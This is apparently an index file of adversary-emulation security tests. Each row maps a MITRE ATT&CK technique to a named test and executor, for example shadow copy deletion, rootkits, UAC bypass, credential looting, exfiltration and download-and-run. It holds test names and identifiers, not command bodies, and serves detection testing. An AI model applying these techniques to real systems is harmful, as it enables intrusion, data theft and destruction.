discovery,T1518.001,Software Discovery: Security Software Discovery,6,Security Software Discovery - AV Discovery via WMI,1553252f-14ea-4d3b-8a08-d7a4211aa945,command_prompt
discovery,T1526,Cloud Service Discovery,1,Azure - Dump Subscription Data with MicroBurst,1e40bb1d-195e-401e-a86b-c192f55e005c,powershell
discovery,T1018,Remote System Discovery,1,Remote System Discovery - net,85321a9c-897f-4a60-9f20-29788e50bccd,command_prompt
discovery,T1018,Remote System Discovery,2,Remote System Discovery - net group Domain Computers,f1bf6c8f-9016-4edf-aff9-80b65f5d711f,command_prompt
discovery,T1018,Remote System Discovery,3,Remote System Discovery - nltest,52ab5108-3f6f-42fb-8ba3-73bc054f22c8,command_prompt
discovery,T1018,Remote System Discovery,4,Remote System Discovery - ping sweep,6db1f57f-d1d5-4223-8a66-55c9c65a9592,command_prompt
discovery,T1018,Remote System Discovery,5,Remote System Discovery - arp,2d5a61f5-0447-4be4-944a-1f8530ed6574,command_prompt
discovery,T1018,Remote System Discovery,6,Remote System Discovery - arp nix,acb6b1ff-e2ad-4d64-806c-6c35fe73b951,sh
discovery,T1018,Remote System Discovery,7,Remote System Discovery - sweep,96db2632-8417-4dbb-b8bb-a8b92ba391de,sh
discovery,T1018,Remote System Discovery,8,Remote System Discovery - nslookup,baa01aaa-5e13-45ec-8a0d-e46c93c9760f,powershell
discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,95e19466-469e-4316-86d2-1dc401b5a959,command_prompt
discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbour,158bd4dd-6359-40ab-b13c-285b9ef6fa25,sh
discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
discovery,T1018,Remote System Discovery,20,Remote System Discovery - net group Domain Controller,5843529a-5056-4bc1-9c13-a311e2af4ca0,command_prompt
discovery,T1046,Network Service Scanning,1,Port Scan,68e907da-2539-48f6-9fc9-257a78c05540,bash
discovery,T1046,Network Service Scanning,2,Port Scan Nmap,515942b0-a09f-4163-a7bb-22fefb6f185f,sh
discovery,T1046,Network Service Scanning,3,Port Scan NMap for Windows,d696a3cb-d7a8-4976-8eb5-5af4abf2e3df,powershell
discovery,T1046,Network Service Scanning,4,Port Scan using python,6ca45b04-9f15-4424-b9d3-84a217285a5c,powershell
discovery,T1046,Network Service Scanning,5,WinPwn - spoolvulnscan,54574908-f1de-4356-9021-8053dd57439a,powershell
discovery,T1046,Network Service Scanning,6,WinPwn - MS17-10,97585b04-5be2-40e9-8c31-82157b8af2d6,powershell
discovery,T1046,Network Service Scanning,7,WinPwn - bluekeep,1cca5640-32a9-46e6-b8e0-fabbe2384a73,powershell
discovery,T1046,Network Service Scanning,8,WinPwn - fruit,bb037826-cbe8-4a41-93ea-b94059d6bb98,powershell
discovery,T1518,Software Discovery,1,Find and Display Internet Explorer Browser Version,68981660-6670-47ee-a5fa-7e74806420a4,command_prompt
discovery,T1518,Software Discovery,2,Applications Installed,c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b,powershell
discovery,T1518,Software Discovery,3,Find and Display Safari Browser Version,103d6533-fd2a-4d08-976a-4a598565280f,sh
discovery,T1518,Software Discovery,4,WinPwn - Dotnetsearch,7e79a1b6-519e-433c-ad55-3ff293667101,powershell
discovery,T1518,Software Discovery,5,WinPwn - DotNet,10ba02d0-ab76-4f80-940d-451633f24c5b,powershell
discovery,T1518,Software Discovery,6,WinPwn - powerSQL,0bb64470-582a-4155-bde2-d6003a95ed34,powershell
discovery,T1124,System Time Discovery,1,System Time Discovery,20aba24b-e61f-4b26-b4ce-4784f763ca20,command_prompt
discovery,T1124,System Time Discovery,2,System Time Discovery - PowerShell,1d5711d6-655c-4a47-ae9c-6503c74fa877,powershell
discovery,T1124,System Time Discovery,3,System Time Discovery in macOS,f449c933-0891-407f-821e-7916a21a1a6f,sh
discovery,T1124,System Time Discovery,4,System Time Discovery W32tm as a Delay,d5d5a6b0-0f92-42d8-985d-47aafa2dd4db,command_prompt
command-and-control,T1132.001,Data Encoding: Standard Encoding,1,Base64 Encoded data.,1164f70f-9a88-4dff-b9ff-dc70e7bf0c25,sh
command-and-control,T1132.001,Data Encoding: Standard Encoding,2,XOR Encoded data.,c3ed6d2a-e3ad-400d-ad78-bbfdbfeacc08,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,1,DNS Large Query Volume,1700f5d6-5a44-487b-84de-bc66f507b0a6,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,2,DNS Regular Beaconing,3efc144e-1af8-46bb-8ca2-1376bb6db8b6,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,3,DNS Long Domain Query,fef31710-223a-40ee-8462-a396d6b66978,powershell
command-and-control,T1071.004,Application Layer Protocol: DNS,4,DNS C2,e7bf9802-2e78-4db9-93b5-181b7bcd37d7,powershell
command-and-control,T1219,Remote Access Software,1,TeamViewer Files Detected Test on Windows,8ca3b96d-8983-4a7f-b125-fc98cc0a2aa0,powershell
command-and-control,T1219,Remote Access Software,2,AnyDesk Files Detected Test on Windows,6b8b7391-5c0a-4f8c-baee-78d8ce0ce330,powershell
command-and-control,T1219,Remote Access Software,3,LogMeIn Files Detected Test on Windows,d03683ec-aae0-42f9-9b4c-534780e0f8e1,powershell
command-and-control,T1219,Remote Access Software,4,GoToAssist Files Detected Test on Windows,1b72b3bd-72f8-4b63-a30b-84e91b9c3578,powershell
command-and-control,T1219,Remote Access Software,5,ScreenConnect Application Download and Install on Windows,4a18cc4e-416f-4966-9a9d-75731c4684c0,powershell
command-and-control,T1219,Remote Access Software,6,Ammyy Admin Software Execution,0ae9e327-3251-465a-a53b-485d4e3f58fa,powershell
command-and-control,T1219,Remote Access Software,7,RemotePC Software Execution,fbff3f1f-b0bf-448e-840f-7e1687affdce,powershell
command-and-control,T1219,Remote Access Software,8,NetSupport - RAT Execution,ecca999b-e0c8-40e8-8416-ad320b146a75,powershell
command-and-control,T1219,Remote Access Software,9,UltraViewer - RAT Execution,19acf63b-55c4-4b6a-8552-00a8865105c8,powershell
command-and-control,T1219,Remote Access Software,10,UltraVNC Execution,42e51815-a6cc-4c75-b970-3f0ff54b610e,powershell
command-and-control,T1572,Protocol Tunneling,1,DNS over HTTPS Large Query Volume,ae9ef4b0-d8c1-49d4-8758-06206f19af0a,powershell
command-and-control,T1572,Protocol Tunneling,2,DNS over HTTPS Regular Beaconing,0c5f9705-c575-42a6-9609-cbbff4b2fc9b,powershell
command-and-control,T1572,Protocol Tunneling,3,DNS over HTTPS Long Domain Query,748a73d5-cea4-4f34-84d8-839da5baa99c,powershell
command-and-control,T1090.003,Proxy: Multi-hop Proxy,1,Psiphon,14d55ca0-920e-4b44-8425-37eedd72b173,powershell
command-and-control,T1090.003,Proxy: Multi-hop Proxy,2,Tor Proxy Usage - Windows,7b9d85e5-c4ce-4434-8060-d3de83595e69,powershell
command-and-control,T1090.003,Proxy: Multi-hop Proxy,3,Tor Proxy Usage - Debian/Ubuntu,5ff9d047-6e9c-4357-b39b-5cf89d9b59c7,sh
command-and-control,T1090.003,Proxy: Multi-hop Proxy,4,Tor Proxy Usage - MacOS,12631354-fdbc-4164-92be-402527e748da,sh
command-and-control,T1571,Non-Standard Port,1,Testing usage of uncommonly used port with PowerShell,21fe622f-8e53-4b31-ba83-6d333c2583f4,powershell
command-and-control,T1571,Non-Standard Port,2,Testing usage of uncommonly used port,5db21e1d-dd9c-4a50-b885-b1e748912767,sh
command-and-control,T1573,Encrypted Channel,1,OpenSSL C2,21caf58e-87ad-440c-a6b8-3ac259964003,powershell
command-and-control,T1095,Non-Application Layer Protocol,1,ICMP C2,0268e63c-e244-42db-bef7-72a9e59fc1fc,powershell
command-and-control,T1095,Non-Application Layer Protocol,2,Netcat C2,bcf0d1c1-3f6a-4847-b1c9-7ed4ea321f37,powershell
command-and-control,T1095,Non-Application Layer Protocol,3,Powercat C2,3e0e0e7f-6aa2-4a61-b61d-526c2cc9330e,powershell
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,1,Malicious User Agents - Powershell,81c13829-f6c9-45b8-85a6-053366d55297,powershell
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,2,Malicious User Agents - CMD,dc3488b0-08c7-4fea-b585-905c83b48180,command_prompt
command-and-control,T1071.001,Application Layer Protocol: Web Protocols,3,Malicious User Agents - Nix,2d7c471a-e887-4b78-b0dc-b0df1f2e0658,sh
command-and-control,T1105,Ingress Tool Transfer,1,rsync remote file copy (push),0fc6e977-cb12-44f6-b263-2824ba917409,bash
command-and-control,T1105,Ingress Tool Transfer,2,rsync remote file copy (pull),3180f7d5-52c0-4493-9ea0-e3431a84773f,bash
command-and-control,T1105,Ingress Tool Transfer,3,scp remote file copy (push),83a49600-222b-4866-80a0-37736ad29344,bash
command-and-control,T1105,Ingress Tool Transfer,4,scp remote file copy (pull),b9d22b9a-9778-4426-abf0-568ea64e9c33,bash
command-and-control,T1105,Ingress Tool Transfer,5,sftp remote file copy (push),f564c297-7978-4aa9-b37a-d90477feea4e,bash
command-and-control,T1105,Ingress Tool Transfer,6,sftp remote file copy (pull),0139dba1-f391-405e-a4f5-f3989f2c88ef,bash
command-and-control,T1105,Ingress Tool Transfer,7,certutil download (urlcache),dd3b61dd-7bbc-48cd-ab51-49ad1a776df0,command_prompt
command-and-control,T1105,Ingress Tool Transfer,8,certutil download (verifyctl),ffd492e3-0455-4518-9fb1-46527c9f241b,powershell
command-and-control,T1105,Ingress Tool Transfer,9,Windows - BITSAdmin BITS Download,a1921cd3-9a2d-47d5-a891-f1d0f2a7a31b,command_prompt
command-and-control,T1105,Ingress Tool Transfer,10,Windows - PowerShell Download,42dc4460-9aa6-45d3-b1a6-3955d34e1fe8,powershell
command-and-control,T1105,Ingress Tool Transfer,11,OSTAP Worming Activity,2ca61766-b456-4fcf-a35a-1233685e1cad,command_prompt
command-and-control,T1105,Ingress Tool Transfer,12,svchost writing a file to a UNC path,fa5a2759-41d7-4e13-a19c-e8f28a53566f,command_prompt
command-and-control,T1105,Ingress Tool Transfer,13,Download a File with Windows Defender MpCmdRun.exe,815bef8b-bf91-4b67-be4c-abe4c2a94ccc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,14,whois file download,c99a829f-0bb8-4187-b2c6-d47d1df74cab,sh
command-and-control,T1105,Ingress Tool Transfer,15,File Download via PowerShell,54a4daf1-71df-4383-9ba7-f1a295d8b6d2,powershell
command-and-control,T1105,Ingress Tool Transfer,16,File download with finger.exe on Windows,5f507e45-8411-4f99-84e7-e38530c45d01,command_prompt
command-and-control,T1105,Ingress Tool Transfer,17,Download a file with IMEWDBLD.exe,1a02df58-09af-4064-a765-0babe1a0d1e2,powershell
command-and-control,T1105,Ingress Tool Transfer,18,Curl Download File,2b080b99-0deb-4d51-af0f-833d37c4ca6a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,19,Curl Upload File,635c9a38-6cbf-47dc-8615-3810bc1167cf,command_prompt
command-and-control,T1105,Ingress Tool Transfer,20,Download a file with Microsoft Connection Manager Auto-Download,d239772b-88e2-4a2e-8473-897503401bcc,command_prompt
command-and-control,T1105,Ingress Tool Transfer,21,MAZE Propagation Script,70f4d07c-5c3e-4d53-bb0a-cdf3ada14baf,powershell
command-and-control,T1105,Ingress Tool Transfer,22,Printer Migration Command-Line Tool UNC share folder into a zip file,49845fc1-7961-4590-a0f0-3dbcf065ae7e,command_prompt
command-and-control,T1105,Ingress Tool Transfer,23,Lolbas replace.exe use to copy file,54782d65-12f0-47a5-b4c1-b70ee23de6df,command_prompt
command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to copy UNC file,ed0335ac-0354-400c-8148-f6151d20035a,command_prompt
command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
command-and-control,T1105,Ingress Tool Transfer,27,Linux Download File and Run,bdc373c5-e9cf-4563-8a7b-a9ba720a90f3,sh
command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
command-and-control,T1090.001,Proxy: Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
command-and-control,T1090.001,Proxy: Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
reconnaissance,T1592.001,Gather Victim Host Information: Hardware,1,Enumerate PlugNPlay Camera,d430bf85-b656-40e7-b238-42db01df0183,powershell
impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
impact,T1489,Service Stop,3,Windows - Stop service by killing process,f3191b84-c38b-400b-867e-3a217a27795f,command_prompt
impact,T1491.001,Defacement: Internal Defacement,1,Replace Desktop Wallpaper,30558d53-9d76-41c4-9267-a7bd5184bed3,powershell
impact,T1491.001,Defacement: Internal Defacement,2,Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message,ffcbfaab-c9ff-470b-928c-f086b326089b,powershell
impact,T1531,Account Access Removal,1,Change User Password - Windows,1b99ef28-f83c-4ec5-8a08-1a56263a5bb2,command_prompt
impact,T1531,Account Access Removal,2,Delete User - Windows,f21a1d7d-a62f-442a-8c3a-2440d43b19e5,command_prompt
impact,T1531,Account Access Removal,3,Remove Account From Domain Admin Group,43f71395-6c37-498e-ab17-897d814a0947,powershell
impact,T1486,Data Encrypted for Impact,1,Encrypt files using gpg (Linux),7b8ce084-3922-4618-8d22-95f996173765,bash
impact,T1486,Data Encrypted for Impact,2,Encrypt files using 7z (Linux),53e6735a-4727-44cc-b35b-237682a151ad,bash
impact,T1486,Data Encrypted for Impact,3,Encrypt files using ccrypt (Linux),08cbf59f-85da-4369-a5f4-049cffd7709f,bash
impact,T1486,Data Encrypted for Impact,4,Encrypt files using openssl (Linux),142752dc-ca71-443b-9359-cf6f497315f1,bash
impact,T1486,Data Encrypted for Impact,5,PureLocker Ransom Note,649349c7-9abf-493b-a7a2-b1aa4d141528,command_prompt
impact,T1496,Resource Hijacking,1,macOS/Linux - Simulate CPU Load with Yes,904a5a0e-fb02-490d-9f8d-0e256eb37549,bash
impact,T1485,Data Destruction,1,Windows - Overwrite file with Sysinternals SDelete,476419b5-aebf-4366-a131-ae3e8dae5fc2,powershell
impact,T1485,Data Destruction,2,macOS/Linux - Overwrite file with DD,38deee99-fd65-4031-bec8-bfa4f9f26146,bash
impact,T1485,Data Destruction,3,Overwrite deleted data on C drive,321fd25e-0007-417f-adec-33232252be19,command_prompt
impact,T1490,Inhibit System Recovery,1,Windows - Delete Volume Shadow Copies,43819286-91a9-4369-90ed-d31fb4da2c01,command_prompt
impact,T1490,Inhibit System Recovery,2,Windows - Delete Volume Shadow Copies via WMI,6a3ff8dd-f49c-4272-a658-11c2fe58bd88,command_prompt
impact,T1490,Inhibit System Recovery,3,Windows - wbadmin Delete Windows Backup Catalog,263ba6cb-ea2b-41c9-9d4e-b652dadd002c,command_prompt
impact,T1490,Inhibit System Recovery,4,Windows - Disable Windows Recovery Console Repair,cf21060a-80b3-4238-a595-22525de4ab81,command_prompt
impact,T1490,Inhibit System Recovery,5,Windows - Delete Volume Shadow Copies via WMI with PowerShell,39a295ca-7059-4a88-86f6-09556c1211e7,powershell
impact,T1490,Inhibit System Recovery,6,Windows - Delete Backup Files,6b1dbaf6-cc8a-4ea6-891f-6058569653bf,command_prompt
impact,T1490,Inhibit System Recovery,7,Windows - wbadmin Delete systemstatebackup,584331dd-75bc-4c02-9e0b-17f5fd81c748,command_prompt
impact,T1490,Inhibit System Recovery,8,Windows - Disable the SR scheduled task,1c68c68d-83a4-4981-974e-8993055fa034,command_prompt
impact,T1490,Inhibit System Recovery,9,Disable System Restore Through Registry,66e647d1-8741-4e43-b7c1-334760c2047f,command_prompt
impact,T1529,System Shutdown/Reboot,1,Shutdown System - Windows,ad254fa8-45c0-403b-8c77-e00b3d3e7a64,command_prompt
impact,T1529,System Shutdown/Reboot,2,Restart System - Windows,f4648f0d-bf78-483c-bafc-3ec99cd1c302,command_prompt
impact,T1529,System Shutdown/Reboot,3,Restart System via `shutdown` - macOS/Linux,6326dbc4-444b-4c04-88f4-27e94d0327cb,bash
impact,T1529,System Shutdown/Reboot,4,Shutdown System via `shutdown` - macOS/Linux,4963a81e-a3ad-4f02-adda-812343b351de,bash
impact,T1529,System Shutdown/Reboot,5,Restart System via `reboot` - macOS/Linux,47d0b042-a918-40ab-8cf9-150ffe919027,bash
impact,T1529,System Shutdown/Reboot,6,Shutdown System via `halt` - Linux,918f70ab-e1ef-49ff-bc57-b27021df84dd,bash
impact,T1529,System Shutdown/Reboot,7,Reboot System via `halt` - Linux,78f92e14-f1e9-4446-b3e9-f1b921f2459e,bash
impact,T1529,System Shutdown/Reboot,8,Shutdown System via `poweroff` - Linux,73a90cd2-48a2-4ac5-8594-2af35fa909fa,bash
impact,T1529,System Shutdown/Reboot,9,Reboot System via `poweroff` - Linux,61303105-ff60-427b-999e-efb90b314e41,bash
impact,T1529,System Shutdown/Reboot,10,Logoff System - Windows,3d8c25b5-7ff5-4c9d-b21f-85ebd06654a4,command_prompt
initial-access,T1133,External Remote Services,1,Running Chrome VPN Extensions via the Registry 2 vpn extension,4c8db261-a58b-42a6-a866-0a294deedde4,powershell
initial-access,T1566.001,Phishing: Spearphishing Attachment,1,Download Macro-Enabled Phishing Attachment,114ccff9-ae6d-4547-9ead-4cd69f687306,powershell
initial-access,T1566.001,Phishing: Spearphishing Attachment,2,Word spawned a command shell and used an IP address in the command line,cbb6799a-425c-4f83-9194-5447a909d67f,powershell
initial-access,T1091,Replication Through Removable Media,1,USB Malware Spread Simulation,d44b7297-622c-4be8-ad88-ec40d7563c75,powershell
initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Source Supply Chain,82a9f001-94c5-495e-9ed5-f530dbded5e2,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
initial-access,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell
initial-access,T1078.003,Valid Accounts: Local Accounts,4,WinPwn - Loot local Credentials - Safetykatz,e9fdb899-a980-4ba4-934b-486ad22e22f4,powershell
exfiltration,T1567,Exfiltration Over Web Service,1,Data Exfiltration with ConfigSecurityPolicy,5568a8f4-a8b1-4c40-9399-4969b642f122,powershell
exfiltration,T1020,Automated Exfiltration,1,IcedID Botnet HTTP PUT,9c780d3d-3a14-4278-8ee5-faaeb2ccfbe0,powershell
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,1,Exfiltrate data HTTPS using curl windows,1cdf2fb0-51b6-4fd8-96af-77020d5f1bf0,command_prompt
exfiltration,T1048.002,Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol,2,Exfiltrate data HTTPS using curl linux,4a4f31e2-46ea-4c26-ad89-f09ad1d5fe01,bash
exfiltration,T1041,Exfiltration Over C2 Channel,1,C2 Data Exfiltration,d1253f6e-c29b-49dc-b466-2147a6191932,powershell
exfiltration,T1048,Exfiltration Over Alternative Protocol,1,Exfiltration Over Alternative Protocol - SSH,f6786cc8-beda-4915-a4d6-ac2f193bb988,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,2,Exfiltration Over Alternative Protocol - SSH,7c3cb337-35ae-4d06-bf03-3032ed2ec268,sh
exfiltration,T1048,Exfiltration Over Alternative Protocol,3,DNSExfiltration (doh),c943d285-ada3-45ca-b3aa-7cd6500c6a48,powershell
exfiltration,T1567.002,Exfiltration Over Web Service: Exfiltration to Cloud Storage,1,Exfiltrate data with rclone to cloud Storage - Mega (Windows),8529ee44-279a-4a19-80bf-b846a40dda58,powershell
exfiltration,T1030,Data Transfer Size Limits,1,Data Transfer Size Limits,ab936c51-10f4-46ce-9144-e02137b2016a,sh
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,1,Exfiltration Over Alternative Protocol - HTTP,1d1abbd6-a3d3-4b2e-bef5-c59293f46eff,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,2,Exfiltration Over Alternative Protocol - ICMP,dd4b4421-2e25-4593-90ae-7021947ad12e,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,3,Exfiltration Over Alternative Protocol - DNS,c403b5a4-b5fc-49f2-b181-d1c80d27db45,manual
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,4,Exfiltration Over Alternative Protocol - HTTP,6aa58451-1121-4490-a8e9-1dada3f1c68c,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,5,Exfiltration Over Alternative Protocol - SMTP,ec3a835e-adca-4c7c-88d2-853b69c11bb9,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,6,MAZE FTP Upload,57799bc2-ad1e-4130-a793-fb0c385130ba,powershell
exfiltration,T1048.003,Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol,7,Exfiltration Over Alternative Protocol - FTP - Rclone,b854eb97-bf9b-45ab-a1b5-b94e4880c56b,powershell
1 Tactic Technique # Technique Name Test # Test Name Test GUID Executor Name
2 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 1 Rundll32 execute JavaScript Remote Payload With GetObject 57ba4ce9-ee7a-4f27-9928-3c70c489b59d command_prompt
3 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 2 Rundll32 execute VBscript command 638730e7-7aed-43dc-bf8c-8117f805f5bb command_prompt
4 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 3 Rundll32 execute VBscript command using Ordinal number 32d1cf1b-cbc2-4c09-8d05-07ec5c83a821 command_prompt
5 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 4 Rundll32 advpack.dll Execution d91cae26-7fc1-457b-a854-34c8aad48c89 command_prompt
6 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 5 Rundll32 ieadvpack.dll Execution 5e46a58e-cbf6-45ef-a289-ed7754603df9 command_prompt
7 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 6 Rundll32 syssetup.dll Execution 41fa324a-3946-401e-bbdd-d7991c628125 command_prompt
8 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 7 Rundll32 setupapi.dll Execution 71d771cd-d6b3-4f34-bc76-a63d47a10b19 command_prompt
9 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 8 Execution of HTA and VBS Files using Rundll32 and URL.dll 22cfde89-befe-4e15-9753-47306b37a6e3 command_prompt
10 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 9 Launches an executable using Rundll32 and pcwutl.dll 9f5d081a-ee5a-42f9-a04e-b7bdc487e676 command_prompt
11 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 10 Execution of non-dll using rundll32.exe ae3a8605-b26e-457c-b6b3-2702fd335bac powershell
12 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 11 Rundll32 with Ordinal Value 9fd5a74b-ba89-482a-8a3e-a5feaa3697b0 command_prompt
13 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 12 Rundll32 with Control_RunDLL e4c04b6f-c492-4782-82c7-3bf75eb8077e command_prompt
14 defense-evasion T1218.011 Signed Binary Proxy Execution: Rundll32 13 Rundll32 with desk.cpl 83a95136-a496-423c-81d3-1c6750133917 command_prompt
15 defense-evasion T1556.003 Modify Authentication Process: Pluggable Authentication Modules 1 Malicious PAM rule 4b9dde80-ae22-44b1-a82a-644bf009eb9c sh
16 defense-evasion T1556.003 Modify Authentication Process: Pluggable Authentication Modules 2 Malicious PAM module 65208808-3125-4a2e-8389-a0a00e9ab326 sh
17 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 1 chmod - Change file or folder mode (numeric mode) 34ca1464-de9d-40c6-8c77-690adf36a135 bash
18 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 2 chmod - Change file or folder mode (symbolic mode) fc9d6695-d022-4a80-91b1-381f5c35aff3 bash
19 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 3 chmod - Change file or folder mode (numeric mode) recursively ea79f937-4a4d-4348-ace6-9916aec453a4 bash
20 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 4 chmod - Change file or folder mode (symbolic mode) recursively 0451125c-b5f6-488f-993b-5a32b09f7d8f bash
21 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 5 chown - Change file or folder ownership and group d169e71b-85f9-44ec-8343-27093ff3dfc0 bash
22 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 6 chown - Change file or folder ownership and group recursively b78598be-ff39-448f-a463-adbf2a5b7848 bash
23 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 7 chown - Change file or folder mode ownership only 967ba79d-f184-4e0e-8d09-6362b3162e99 bash
24 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 8 chown - Change file or folder ownership recursively 3b015515-b3d8-44e9-b8cd-6fa84faf30b2 bash
25 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 9 chattr - Remove immutable file attribute e7469fe2-ad41-4382-8965-99b94dd3c13f sh
26 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 10 Chmod through c script 973631cf-6680-4ffa-a053-045e1b6b67ab sh
27 defense-evasion T1222.002 File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification 11 Chown through c script 18592ba1-5f88-4e3c-abc8-ab1c6042e389 sh
28 defense-evasion T1216.001 Signed Script Proxy Execution: Pubprn 1 PubPrn.vbs Signed Script Bypass 9dd29a1f-1e16-4862-be83-913b10a88f6c command_prompt
29 defense-evasion T1006 Direct Volume Access 1 Read volume boot sector via DOS device path (PowerShell) 88f6327e-51ec-4bbf-b2e8-3fea534eab8b powershell
30 defense-evasion T1014 Rootkit 1 Loadable Kernel Module based Rootkit dfb50072-e45a-4c75-a17e-a484809c8553 sh
31 defense-evasion T1014 Rootkit 2 Loadable Kernel Module based Rootkit 75483ef8-f10f-444a-bf02-62eb0e48db6f sh
32 defense-evasion T1014 Rootkit 3 dynamic-linker based rootkit (libprocesshider) 1338bf0c-fd0c-48c0-9e65-329f18e2c0d3 sh
33 defense-evasion T1014 Rootkit 4 Loadable Kernel Module based Rootkit (Diamorphine) 0b996469-48c6-46e2-8155-a17f8b6c2247 sh
34 defense-evasion T1548.002 Abuse Elevation Control Mechanism: Bypass User Account Control 1 Bypass UAC using Event Viewer (cmd) 5073adf8-9a50-4bd9-b298-a9bd2ead8af9 command_prompt
